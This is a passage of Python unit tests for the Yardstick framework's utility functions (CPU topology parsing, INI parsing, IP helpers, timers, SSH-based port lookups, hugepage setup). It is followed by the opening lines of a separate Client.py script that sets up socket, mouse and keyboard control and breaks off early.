microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 120
initial apicid : 120
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4411.31
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 44
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 0
cpu cores : 22
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4410.61
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 85
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.573
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 26
cpu cores : 22
apicid : 117
initial apicid : 117
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4409.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 86
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 27
cpu cores : 22
apicid : 119
initial apicid : 119
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4406.62
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 87
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.708
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 121
initial apicid : 121
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4413.48
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
"""
    socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
    # Flattened views over the parsed topology, sorted and de-duplicated.
    processors = socket_map.processors()
    self.assertEqual(processors, [1, 2, 43, 44, 85, 86, 87])
    cores = socket_map.cores()
    self.assertEqual(cores, [0, 1, 2, 26, 27, 28])
    sockets = socket_map.sockets()
    self.assertEqual(sockets, [0, 1])
class ChangeObjToDictTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.change_obj_to_dict."""

    def test_change_obj_to_dict(self):
        """Instance attributes should come back as a plain dict."""
        class Dummy(object):
            def __init__(self):
                self.name = 'yardstick'

        converted = utils.change_obj_to_dict(Dummy())
        self.assertEqual(converted, {'name': 'yardstick'})
class SetDictValueTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.set_dict_value."""

    def test_set_dict_value(self):
        """A dotted key path creates the intermediate nested dict."""
        source = {'hello': 'world'}
        updated = utils.set_dict_value(source, 'welcome.to', 'yardstick')
        self.assertEqual(updated.get('welcome', {}).get('to'), 'yardstick')
class RemoveFileTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.remove_file."""

    def test_remove_file(self):
        """Removing a non-existent file may only raise an OSError."""
        try:
            utils.remove_file('notexistfile.txt')
        except Exception as e:  # pylint: disable=broad-except
            # NOTE(ralonsoh): to narrow the scope of this exception.
            # assertIsInstance reports the actual type on failure, unlike
            # the former assertTrue(isinstance(...)).
            self.assertIsInstance(e, OSError)
class ParseIniFileTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.parse_ini_file, with ConfigParser patched out."""

    def setUp(self):
        self._mock_config_parser_type = mock.patch.object(
            configparser, 'ConfigParser')
        self.mock_config_parser_type = self._mock_config_parser_type.start()
        self.addCleanup(self._stop_mocks)

    def _stop_mocks(self):
        self._mock_config_parser_type.stop()

    def test_parse_ini_file(self):
        """All sections plus DEFAULT are returned as nested dicts."""
        default_section = {'default1': 'value1', 'default2': 'value2'}
        section_one = {'key1': 'value11', 'key2': 'value22'}
        section_two = {'key1': 'value123', 'key2': 'value234'}
        parser = mock.Mock()
        self.mock_config_parser_type.return_value = parser
        parser.read.return_value = True
        parser.sections.return_value = ['s1', 's2']
        # items() is queried once for DEFAULT, then once per section.
        parser.items.side_effect = iter([
            default_section.items(),
            section_one.items(),
            section_two.items(),
        ])
        expected = {'DEFAULT': default_section,
                    's1': section_one,
                    's2': section_two}
        self.assertDictEqual(expected, utils.parse_ini_file('my_path'))

    @mock.patch.object(utils, 'logger')
    def test_parse_ini_file_missing_section_header(self, *args):
        """A MissingSectionHeaderError from read() propagates."""
        parser = mock.Mock()
        self.mock_config_parser_type.return_value = parser
        parser.read.side_effect = configparser.MissingSectionHeaderError(
            mock.Mock(), 321, mock.Mock())
        with self.assertRaises(configparser.MissingSectionHeaderError):
            utils.parse_ini_file('my_path')

    def test_parse_ini_file_no_file(self):
        """An unreadable file raises RuntimeError."""
        parser = mock.Mock()
        self.mock_config_parser_type.return_value = parser
        parser.read.return_value = False
        with self.assertRaises(RuntimeError):
            utils.parse_ini_file('my_path')

    def test_parse_ini_file_no_default_section_header(self):
        """A missing DEFAULT section yields an empty DEFAULT dict."""
        section_one = {'key1': 'value11', 'key2': 'value22'}
        section_two = {'key1': 'value123', 'key2': 'value234'}
        parser = mock.Mock()
        self.mock_config_parser_type.return_value = parser
        parser.read.return_value = True
        parser.sections.return_value = ['s1', 's2']
        parser.items.side_effect = iter([
            configparser.NoSectionError(mock.Mock()),
            section_one.items(),
            section_two.items(),
        ])
        expected = {'DEFAULT': {},
                    's1': section_one,
                    's2': section_two}
        self.assertDictEqual(expected, utils.parse_ini_file('my_path'))
class TestUtils(ut_base.BaseUnitTestCase):
    """Tests for assorted helpers in yardstick.common.utils."""

    @mock.patch('yardstick.common.utils.os.makedirs')
    def test_makedirs(self, *_):
        self.assertIsNone(utils.makedirs('a/b/c/d'))

    @mock.patch('yardstick.common.utils.os.makedirs')
    def test_makedirs_exists(self, mock_os_makedirs):
        # EEXIST must be swallowed: the directory already being there is fine.
        mock_os_makedirs.side_effect = OSError(errno.EEXIST, 'exists')
        self.assertIsNone(utils.makedirs('a/b/c/d'))

    @mock.patch('yardstick.common.utils.os.makedirs')
    def test_makedirs_busy(self, mock_os_makedirs):
        # Any other errno is expected to propagate.
        mock_os_makedirs.side_effect = OSError(errno.EBUSY, 'busy')
        with self.assertRaises(OSError):
            utils.makedirs('a/b/c/d')

    @mock.patch('yardstick.common.utils.jsonify')
    def test_result_handler(self, mock_jsonify):
        # result_handler must forward {'status', 'result'} to jsonify and
        # return jsonify's value unchanged.
        mock_jsonify.return_value = 432
        self.assertEqual(utils.result_handler('x', 234), 432)
        mock_jsonify.assert_called_once_with({'status': 'x', 'result': 234})

    @mock.patch('random.randint')
    @mock.patch('socket.socket')
    def test_get_free_port(self, mock_socket, mock_randint):
        mock_randint.return_value = 7777
        s = mock_socket('x', 'y')
        # First probe reports the port in use (0), second reports it free.
        s.connect_ex.side_effect = iter([0, 1])
        result = utils.get_free_port('10.20.30.40')
        self.assertEqual(result, 7777)
        self.assertEqual(s.connect_ex.call_count, 2)

    @mock.patch('subprocess.check_output')
    def test_execute_command(self, mock_check_output):
        # Output is split on the platform line separator.
        expected = ['hello world', '1234']
        mock_check_output.return_value = os.linesep.join(expected)
        result = utils.execute_command('my_command arg1 arg2')
        self.assertEqual(result, expected)

    @mock.patch('subprocess.Popen')
    def test_source_env(self, mock_popen):
        # Snapshot os.environ: source_env mutates it and we restore below.
        base_env = deepcopy(os.environ)
        mock_process = mock_popen()
        output_list = [
            'garbage line before',
            'NEW_ENV_VALUE=234',
            'garbage line after',
        ]
        mock_process.communicate.return_value = os.linesep.join(output_list), '', 0
        # Only the KEY=VALUE line is extracted; garbage lines are ignored.
        expected = {'NEW_ENV_VALUE': '234'}
        result = utils.source_env('my_file')
        self.assertDictEqual(result, expected)
        os.environ.clear()
        os.environ.update(base_env)

    @mock.patch.object(configparser, 'ConfigParser')
    def test_parse_ini_file(self, mock_config_parser_type):
        defaults = {
            'default1': 'value1',
            'default2': 'value2',
        }
        s1 = {
            'key1': 'value11',
            'key2': 'value22',
        }
        s2 = {
            'key1': 'value123',
            'key2': 'value234',
        }
        mock_config_parser = mock_config_parser_type()
        mock_config_parser.read.return_value = True
        mock_config_parser.sections.return_value = ['s1', 's2']
        # items() is queried once for DEFAULT, then once per section.
        mock_config_parser.items.side_effect = iter([
            defaults.items(),
            s1.items(),
            s2.items(),
        ])
        expected = {
            'DEFAULT': defaults,
            's1': s1,
            's2': s2,
        }
        result = utils.parse_ini_file('my_path')
        self.assertDictEqual(result, expected)

    @mock.patch.object(utils, 'logger')
    @mock.patch.object(configparser, 'ConfigParser')
    def test_parse_ini_file_missing_section_header(
            self, mock_config_parser_type, *args):
        # A MissingSectionHeaderError raised by read() must propagate.
        mock_config_parser = mock_config_parser_type()
        mock_config_parser.read.side_effect = (
            configparser.MissingSectionHeaderError(mock.Mock(), 321,
                                                   mock.Mock()))
        with self.assertRaises(configparser.MissingSectionHeaderError):
            utils.parse_ini_file('my_path')

    @mock.patch.object(configparser, 'ConfigParser')
    def test_parse_ini_file_no_file(self, mock_config_parser_type):
        # read() returning False (unreadable file) raises RuntimeError.
        mock_config_parser = mock_config_parser_type()
        mock_config_parser.read.return_value = False
        with self.assertRaises(RuntimeError):
            utils.parse_ini_file('my_path')

    @mock.patch.object(configparser, 'ConfigParser')
    def test_parse_ini_file_no_default_section_header(self, mock_config_parser_type):
        # Missing DEFAULT section yields an empty DEFAULT dict, not an error.
        s1 = {
            'key1': 'value11',
            'key2': 'value22',
        }
        s2 = {
            'key1': 'value123',
            'key2': 'value234',
        }
        mock_config_parser = mock_config_parser_type()
        mock_config_parser.read.return_value = True
        mock_config_parser.sections.return_value = ['s1', 's2']
        mock_config_parser.items.side_effect = iter([
            configparser.NoSectionError(mock.Mock()),
            s1.items(),
            s2.items(),
        ])
        expected = {
            'DEFAULT': {},
            's1': s1,
            's2': s2,
        }
        result = utils.parse_ini_file('my_path')
        self.assertDictEqual(result, expected)

    def test_join_non_strings(self):
        # Non-string items are stringified; a single iterable argument is
        # flattened; a single string stays intact.
        self.assertEqual(utils.join_non_strings(':'), '')
        self.assertEqual(utils.join_non_strings(':', 'a'), 'a')
        self.assertEqual(utils.join_non_strings(':', 'a', 2, 'c'), 'a:2:c')
        self.assertEqual(utils.join_non_strings(':', ['a', 2, 'c']), 'a:2:c')
        self.assertEqual(utils.join_non_strings(':', 'abc'), 'abc')

    def test_validate_non_string_sequence(self):
        # Sequences pass through; strings and scalars fall back to the
        # default (positional or keyword) or raise when raise_exc is set.
        self.assertEqual(utils.validate_non_string_sequence([1, 2, 3]), [1, 2, 3])
        self.assertIsNone(utils.validate_non_string_sequence('123'))
        self.assertIsNone(utils.validate_non_string_sequence(1))
        self.assertEqual(utils.validate_non_string_sequence(1, 2), 2)
        self.assertEqual(utils.validate_non_string_sequence(1, default=2), 2)
        with self.assertRaises(RuntimeError):
            utils.validate_non_string_sequence(1, raise_exc=RuntimeError)
class TestUtilsIpAddrMethods(ut_base.BaseUnitTestCase):
    """Exercise the IP-address helper functions in yardstick.common.utils."""

    GOOD_IP_V4_ADDRESS_STR_LIST = [
        u'0.0.0.0',
        u'10.20.30.40',
        u'127.0.0.1',
        u'10.20.30.40',
        u'172.29.50.75',
        u'192.168.230.9',
        u'255.255.255.255',
    ]

    GOOD_IP_V4_MASK_STR_LIST = [
        u'/1',
        u'/8',
        u'/13',
        u'/19',
        u'/24',
        u'/32',
    ]

    GOOD_IP_V6_ADDRESS_STR_LIST = [
        u'::1',
        u'fe80::250:56ff:fe89:91ff',
        u'123:4567:89ab:cdef:123:4567:89ab:cdef',
    ]

    GOOD_IP_V6_MASK_STR_LIST = [
        u'/1',
        u'/16',
        u'/29',
        u'/64',
        u'/99',
        u'/128',
    ]

    INVALID_IP_ADDRESS_STR_LIST = [
        1,
        u'w.x.y.z',
        u'10.20.30.40/33',
        u'123:4567:89ab:cdef:123:4567:89ab:cdef/129',
    ]

    def test_make_ipv4_address(self):
        """Every well-formed IPv4 string becomes an IPv4Address."""
        for address in self.GOOD_IP_V4_ADDRESS_STR_LIST:
            # No mask suffix on these inputs.
            self.assertEqual(utils.make_ipv4_address(address),
                             ipaddress.IPv4Address(address), address)

    def test_make_ipv4_address_error(self):
        """Invalid strings and IPv6 addresses must raise."""
        bad_inputs = (self.INVALID_IP_ADDRESS_STR_LIST +
                      self.GOOD_IP_V6_ADDRESS_STR_LIST)
        for address in bad_inputs:
            self.assertRaises(Exception, utils.make_ipv4_address, address)

    def test_safe_ip_address(self):
        """Plain IPv4 strings parse into ip_address objects."""
        for address in self.GOOD_IP_V4_ADDRESS_STR_LIST:
            # No mask suffix on these inputs.
            self.assertEqual(utils.safe_ip_address(address),
                             ipaddress.ip_address(address), address)

    def test_safe_ip_address_v6_ip(self):
        """Plain IPv6 strings parse into ip_address objects."""
        for address in self.GOOD_IP_V6_ADDRESS_STR_LIST:
            # No mask suffix on these inputs.
            self.assertEqual(utils.safe_ip_address(address),
                             ipaddress.ip_address(address), address)

    @mock.patch("yardstick.common.utils.logging")
    def test_safe_ip_address_negative(self, *args):
        # NOTE(ralonsoh): check the calls to mocked functions.
        for value in self.INVALID_IP_ADDRESS_STR_LIST:
            self.assertIsNone(utils.safe_ip_address(value), value)

        # Valid addresses with a mask suffix are rejected too, v4 then v6.
        v4_pairs = product(self.GOOD_IP_V4_ADDRESS_STR_LIST,
                           self.GOOD_IP_V4_MASK_STR_LIST)
        v6_pairs = product(self.GOOD_IP_V6_ADDRESS_STR_LIST,
                           self.GOOD_IP_V6_MASK_STR_LIST)
        for pair in chain(v4_pairs, v6_pairs):
            value = ''.join(pair)
            self.assertIsNone(utils.safe_ip_address(value), value)

    def test_get_ip_version(self):
        """IPv4 strings report version 4."""
        for address in self.GOOD_IP_V4_ADDRESS_STR_LIST:
            # No mask suffix on these inputs.
            self.assertEqual(utils.get_ip_version(address), 4, address)

    def test_get_ip_version_v6_ip(self):
        """IPv6 strings report version 6."""
        for address in self.GOOD_IP_V6_ADDRESS_STR_LIST:
            # No mask suffix on these inputs.
            self.assertEqual(utils.get_ip_version(address), 6, address)

    @mock.patch("yardstick.common.utils.logging")
    def test_get_ip_version_negative(self, *args):
        # NOTE(ralonsoh): check the calls to mocked functions.
        for value in self.INVALID_IP_ADDRESS_STR_LIST:
            self.assertIsNone(utils.get_ip_version(value), value)

        # Valid addresses with a mask suffix are rejected too, v4 then v6.
        v4_pairs = product(self.GOOD_IP_V4_ADDRESS_STR_LIST,
                           self.GOOD_IP_V4_MASK_STR_LIST)
        v6_pairs = product(self.GOOD_IP_V6_ADDRESS_STR_LIST,
                           self.GOOD_IP_V6_MASK_STR_LIST)
        for pair in chain(v4_pairs, v6_pairs):
            value = ''.join(pair)
            self.assertIsNone(utils.get_ip_version(value), value)

    def test_ip_to_hex(self):
        """Dotted-quad IPv4 addresses convert to 8 hex digits."""
        conversions = (
            ('0.0.0.0', '00000000'),
            ('10.20.30.40', '0a141e28'),
            ('127.0.0.1', '7f000001'),
            ('172.31.90.100', 'ac1f5a64'),
            ('192.168.254.253', 'c0a8fefd'),
            ('255.255.255.255', 'ffffffff'),
        )
        for address, expected in conversions:
            self.assertEqual(utils.ip_to_hex(address), expected)

    def test_ip_to_hex_v6_ip(self):
        """IPv6 addresses are returned unchanged."""
        for value in self.GOOD_IP_V6_ADDRESS_STR_LIST:
            self.assertEqual(utils.ip_to_hex(value), value)

    @mock.patch("yardstick.common.utils.logging")
    def test_ip_to_hex_negative(self, *args):
        # NOTE(ralonsoh): check the calls to mocked functions.
        # Masked and invalid inputs are both passed through unchanged.
        masked = (''.join(pair)
                  for pair in product(self.GOOD_IP_V4_ADDRESS_STR_LIST,
                                      self.GOOD_IP_V4_MASK_STR_LIST))
        for value in chain(masked, self.INVALID_IP_ADDRESS_STR_LIST):
            self.assertEqual(utils.ip_to_hex(value), value)

    def test_get_mask_from_ip_range_ipv4(self):
        """The prefix length is recovered from an IPv4 host range."""
        for prefix_len in range(8, 30):
            network = ipaddress.ip_network('1.1.1.1/{}'.format(prefix_len),
                                           strict=False)
            self.assertEqual(prefix_len, utils.get_mask_from_ip_range(
                network[2], network[-2]))

    def test_get_mask_from_ip_range_ipv6(self):
        """The prefix length is recovered from an IPv6 host range."""
        for prefix_len in range(8, 120):
            network = ipaddress.ip_network('2001::1/{}'.format(prefix_len),
                                           strict=False)
            self.assertEqual(prefix_len, utils.get_mask_from_ip_range(
                network[2], network[-2]))
class SafeDecodeUtf8TestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.safe_decode_utf8."""

    @unittest.skipIf(six.PY2,
                     'This test should only be launched with Python 3.x')
    def test_safe_decode_utf8(self):
        """Bytes input must come back as a native str with the same text."""
        decoded = utils.safe_decode_utf8(b'this is a byte array')
        self.assertIs(type(decoded), str)
        self.assertEqual('this is a byte array', decoded)
class ReadMeminfoTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.read_meminfo."""

    # Abbreviated /proc/meminfo sample and the dict it should parse into.
    MEMINFO = (b'MemTotal: 65860500 kB\n'
               b'MemFree: 28690900 kB\n'
               b'MemAvailable: 52873764 kB\n'
               b'Active(anon): 3015676 kB\n'
               b'HugePages_Total: 8\n'
               b'Hugepagesize: 1048576 kB')
    MEMINFO_DICT = {'MemTotal': '65860500',
                    'MemFree': '28690900',
                    'MemAvailable': '52873764',
                    'Active(anon)': '3015676',
                    'HugePages_Total': '8',
                    'Hugepagesize': '1048576'}

    def test_read_meminfo(self):
        """read_meminfo fetches /proc/meminfo and parses it into a dict."""
        ssh_client = ssh.SSH('user', 'host')
        with mock.patch.object(ssh_client, 'get_file_obj') as \
                mock_get_client, \
                mock.patch.object(six, 'BytesIO',
                                  return_value=six.BytesIO(self.MEMINFO)):
            output = utils.read_meminfo(ssh_client)
            mock_get_client.assert_called_once_with('/proc/meminfo', mock.ANY)
        self.assertEqual(self.MEMINFO_DICT, output)
class TimerTestCase(ut_base.BaseUnitTestCase):
    """Tests for the utils.Timer context manager / iterator."""

    def test__getattr(self):
        """After the block, total_seconds() and delta reflect elapsed time."""
        with utils.Timer() as measured:
            time.sleep(1)
        self.assertEqual(1, round(measured.total_seconds(), 0))
        self.assertEqual(1, measured.delta.seconds)

    def test__enter_with_timeout(self):
        """A timeout that never fires does not disturb measurement."""
        with utils.Timer(timeout=10) as measured:
            time.sleep(1)
        self.assertEqual(1, round(measured.total_seconds(), 0))

    def test__enter_with_timeout_exception(self):
        """Exceeding the timeout raises TimerTimeout by default."""
        with self.assertRaises(exceptions.TimerTimeout):
            with utils.Timer(timeout=1):
                time.sleep(2)

    def test__enter_with_timeout_no_exception(self):
        """raise_exception=False suppresses the timeout error."""
        with utils.Timer(timeout=1, raise_exception=False):
            time.sleep(2)

    def test__iter(self):
        """Iterating a Timer yields once per pass until the timeout."""
        laps = []
        for lap in utils.Timer(timeout=2):
            laps.append(lap)
            time.sleep(1.1)
        self.assertEqual(2, len(laps))

    def test_delta_time_sec(self):
        """delta_time_sec() reports the elapsed time as a float."""
        with utils.Timer() as measured:
            self.assertIsInstance(measured.delta_time_sec(), float)
class WaitUntilTrueTestCase(ut_base.BaseUnitTestCase):
    """Tests for utils.wait_until_true."""

    def test_no_timeout(self):
        """A predicate that is already true returns None without raising."""
        self.assertIsNone(utils.wait_until_true(lambda: True,
                                                timeout=1, sleep=1))

    def test_timeout_generic_exception(self):
        """A never-true predicate raises WaitTimeout by default."""
        with self.assertRaises(exceptions.WaitTimeout):
            self.assertIsNone(utils.wait_until_true(lambda: False,
                                                    timeout=1, sleep=1))

    def test_timeout_given_exception(self):
        """A caller-supplied exception class is raised on timeout."""
        class MyTimeoutException(exceptions.YardstickException):
            message = 'My timeout exception'

        with self.assertRaises(MyTimeoutException):
            self.assertIsNone(
                utils.wait_until_true(lambda: False, timeout=1, sleep=1,
                                      exception=MyTimeoutException))

    def _run_thread(self):
        # Helper executed on a worker (non-main) thread.
        with self.assertRaises(exceptions.WaitTimeout):
            utils.wait_until_true(lambda: False, timeout=1, sleep=1)

    def test_timeout_no_main_thread(self):
        """wait_until_true must also time out off the main thread."""
        worker = threading.Thread(target=self._run_thread)
        worker.start()
        worker.join(timeout=3)
class SendSocketCommandTestCase(unittest.TestCase):
    """Tests for utils.send_socket_command."""

    @mock.patch.object(socket, 'socket')
    def test_execute_correct(self, mock_socket):
        # Arrange: a socket whose connect_ex reports success (0).
        sock = mock.Mock()
        sock.connect_ex.return_value = 0
        mock_socket.return_value = sock

        result = utils.send_socket_command('host', 22, 'command')

        self.assertEqual(0, result)
        mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect_ex.assert_called_once_with(('host', 22))
        sock.sendall.assert_called_once_with(six.b('command'))
        sock.close.assert_called_once()

    @mock.patch.object(socket, 'socket')
    def test_execute_exception(self, mock_socket):
        # Arrange: sendall blows up with socket.error after a good connect.
        sock = mock.Mock()
        sock.connect_ex.return_value = 0
        sock.sendall.side_effect = socket.error
        mock_socket.return_value = sock

        result = utils.send_socket_command('host', 22, 'command')

        # A send failure is reported as return code 1, and the socket is
        # still closed.
        self.assertEqual(1, result)
        mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect_ex.assert_called_once_with(('host', 22))
        sock.sendall.assert_called_once_with(six.b('command'))
        sock.close.assert_called_once()
class GetPortMacTestCase(unittest.TestCase):
    """Tests for utils.get_port_mac."""

    def setUp(self):
        self.ssh_client = mock.Mock()
        # Shell output carries a trailing space on purpose (see below).
        self.ssh_client.execute.return_value = (0, 'foo ', '')

    def test_ssh_client_execute_called(self):
        utils.get_port_mac(self.ssh_client, 99)
        self.ssh_client.execute.assert_called_once_with(
            "ifconfig |grep HWaddr |grep 99 |awk '{print $5}' ",
            raise_on_error=True)

    def test_return_value(self):
        # Trailing whitespace from the shell output must be stripped.
        self.assertEqual('foo', utils.get_port_mac(self.ssh_client, 99))
class GetPortIPTestCase(unittest.TestCase):
    """Tests for utils.get_port_ip."""

    def setUp(self):
        self.ssh_client = mock.Mock()
        # Shell output carries a trailing space on purpose (see below).
        self.ssh_client.execute.return_value = (0, 'foo ', '')

    def test_ssh_client_execute_called(self):
        utils.get_port_ip(self.ssh_client, 99)
        self.ssh_client.execute.assert_called_once_with(
            "ifconfig 99 |grep 'inet addr' |awk '{print $2}' |cut -d ':' -f2 ",
            raise_on_error=True)

    def test_return_value(self):
        # Trailing whitespace from the shell output must be stripped.
        self.assertEqual('foo', utils.get_port_ip(self.ssh_client, 99))
class SafeCaseTestCase(unittest.TestCase):
    """Tests for utils.safe_cast (class name keeps a historical typo)."""

    def test_correct_type_int(self):
        self.assertEqual(35, utils.safe_cast('35', int, 0))

    def test_correct_int_as_string(self):
        # The target type may also be named as a string.
        self.assertEqual(25, utils.safe_cast('25', 'int', 0))

    def test_incorrect_type_as_string(self):
        # An unknown type name must raise InvalidType.
        with self.assertRaises(exceptions.InvalidType):
            utils.safe_cast('100', 'intt', 0)

    def test_default_value(self):
        # Uncastable input falls back to the supplied default.
        self.assertEqual(0, utils.safe_cast('', 'int', 0))
class SetupHugepagesTestCase(unittest.TestCase):
    """Tests for utils.setup_hugepages."""

    @mock.patch.object(six, 'BytesIO', return_value=six.BytesIO(b'5\n'))
    @mock.patch.object(utils, 'read_meminfo',
                       return_value={'Hugepagesize': '1024'})
    def test_setup_hugepages(self, mock_meminfo, *args):
        # NOTE: the local mock was previously named ``ssh``, shadowing the
        # module-level ``ssh`` import used by other tests in this file.
        mock_ssh = mock.Mock()
        mock_ssh.execute = mock.Mock()
        hp_size_kb, hp_number, hp_number_set = utils.setup_hugepages(
            mock_ssh, 10 * 1024)
        mock_meminfo.assert_called_once_with(mock_ssh)
        # 10 MB requested with 1024 kB pages -> 10 pages requested.
        mock_ssh.execute.assert_called_once_with(
            'echo 10 | sudo tee /proc/sys/vm/nr_hugepages')
        self.assertEqual(hp_size_kb, 1024)
        self.assertEqual(hp_number, 10)
        # The patched BytesIO reports only 5 pages actually configured.
        self.assertEqual(hp_number_set, 5)
|
Client.py | #!/usr/bin/env python
# coding: utf-8
# In[9]:
from pymouse import PyMouse
from pykeyboard import PyKeyboard
import socket
import os
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
import sys
import threading
from tkinter import *
from tkinter import filedialog
# In[ ]:
# Determine this machine's primary LAN IP: prefer the first non-loopback
# address reported for the hostname; otherwise learn the outbound interface
# address by connect()ing a UDP socket towards 8.8.8.8 (no packet is sent
# by a UDP connect).
IP = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2]
if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)),
s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
SERVERIP = ""  # filled in by recvInput() once the server makes contact
# In[ ]:
os.environ["SDL_VIDEO_WINDOW_POS"] = "0,0"  # pin the pygame window to the top-left corner
PORT = 12345  # single port reused for UDP discovery/input and TCP file transfer
HOSTNAME = socket.gethostname()
RES = PyMouse().screen_size()  # local screen resolution (width, height)
# In[ ]:
def cls():
